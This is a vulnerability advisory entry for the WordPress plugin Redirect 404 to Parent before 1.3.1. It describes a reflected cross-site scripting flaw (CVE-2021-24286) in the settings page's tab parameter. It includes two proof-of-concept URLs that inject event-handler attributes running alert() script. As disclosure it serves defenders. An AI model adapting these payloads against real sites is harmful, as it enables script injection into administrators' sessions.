WordPress Plugin Vulnerabilities

Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting (XSS)

Description

The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab=" onMouseOver="alert(1);

https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab="+style%3D"animation-name%3Aspinner"+onanimationstart%3D"alert(%2FXSS%2F)

Affects Plugins

Plugin icon
redirect-404-to-parent
Fixed in 1.3.1

References

CVE
CVE-2021-24286

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
0xB9
Submitter twitter
0xB9sec
Verified
Yes
WPVDB ID
b9a535f3-cb0b-46fe-b345-da3462584e27

Timeline

Publicly Published
2021-04-23 (about 3 years ago)
Added
2021-04-23 (about 3 years ago)
Last Updated
2021-04-24 (about 3 years ago)

Other

Published
Title
Published
2017-03-07
Title
WP SlimStat <= 3.5.5 - Overview URI Stored XSS
Published
2016-08-03
Title
Activity Log <= 2.3.2 - Cross-Site Scripting (XSS) in 'page'
Published
2021-08-23
Title
WP Video Lightbox < 1.9.3 - Contributor+ Stored Cross-Site Scripting
Published
2023-02-13
Title
i2 Pros & Cons <= 1.3.1 - Contributor+ Stored XSS
Published
2022-09-02
Title
History Timeline <= 1.0.6 - Author+ Stored Cross-Site Scripting